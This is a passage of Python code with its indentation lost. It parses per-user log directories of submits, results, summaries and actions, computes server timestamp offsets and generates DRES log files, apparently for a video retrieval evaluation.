print("---\n\t +++ {} +++ \n\tDATA: {} \n".format(user_name, path))
self.parsed[team_name] = self.validate_user(user_name, path)
print("%%% DONE! %%%")
def calculate_server_ts_diff(self, team_name: str, team_names: list):
print("%%% CALCULATING SERVER TS DIFF %%%")
diffs = []
for user_name in team_names:
path = config.path(user_name)
print("---\n\t +++ {} +++ \n\tDATA: {} \n".format(user_name, path))
ds = self.calculate_server_ts_diff_for_user(user_name, path)
diffs.append(ds)
#pp.pprint(diffs)
mins = []
for dfs in diffs:
mins.append(np.min(np.array(dfs)))
i = 0
for user_name in team_names:
print("DIFF MIN FOR {}: {}".format(user_name, mins[i]))
i += 1
print("%%% DONE! %%%")
return mins
def parse_user_submits(self, team, user_name, path):
print("\t--- PARSING SUBMITS. ---")
dir = config.dir_names()["requests"]
full_path = os.path.join(path, dir)
submits = []
for filename in os.listdir(full_path):
if not (filename.endswith("submit.json")):
continue
log = JsonLog.parse_file(full_path, filename)
submits += log
us = UserSubmits(submits)
self._task_results.push_user_submits(team, user_name, us, self._verdicts)
print("\t--- DONE. ---")
def parse_user_results(self, team, user_name, path, submits, summaries : Summaries):
print("\t--- PARSING TASK RESULTS. ---")
dir = config.dir_names()["results"]
full_path = os.path.join(path, dir)
results = []
for filename in os.listdir(full_path):
log = JsonLog.parse_file(full_path, filename)
results += log
r = UserResults(results)
#self._results.push_user_results(team, user_name, r)
self._task_results.push_user_results(team, user_name, r, submits, summaries)
print("\t--- DONE. ---")
def parse_user_summary(self, team, user_name, path, submits):
print("\t--- PARSING SUMMARY. ---")
dir = config.dir_names()["summary"]
full_path = os.path.join(path, dir)
summary_logs = []
for filename in os.listdir(full_path):
log = SummaryLog.parse_file(full_path, filename)
summary_logs += log.data()
self.raw_summaries().push_user_summary(team, user_name, summary_logs)
self.summaries().push_user_summary(team, user_name, summary_logs, submits)
print("\t--- DONE. ---")
def generate_DRES_logs(self, team_name: str, team_names: list):
print("%%% GENERATING DRES LOG FILES %%%")
for user_name in team_names:
path = config.path(user_name)
print("---\n\t +++ {} +++ \n\tDATA: {} \n".format(user_name, path))
self.generate_DRES_results_for_user(team_name, user_name, path)
print("%%% DONE! %%%")
def calculate_server_ts_diff_for_user(self, user_name, path):
dir = config.dir_names()["actions"]
diffs = []
if (self.verbose):
print("\t--- DIR: {} ---".format(dir))
full_path = os.path.join(path, dir)
for filename in os.listdir(full_path):
actions = JsonLog.parse_file(full_path, filename)
for a in actions:
ser_ts = a["metadata"]["serverTimestamp"]
loc_ts = a["metadata"]["timestamp"]
diff = ser_ts - loc_ts
if ser_ts < 10000:
continue
diffs.append(diff)
if (self.verbose):
print("\t--- DONE. ---")
return diffs
def generate_DRES_results_for_user(self, team_name, user_name, path):
dir = config.dir_names()["requests"]
out_dir = config.out_dir("dres")
if (self.verbose):
print("\t--- DIR: {} ---".format(dir))
print("\t--- OUT: {} ---".format(out_dir))
full_path = os.path.join(path, dir)
# For |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.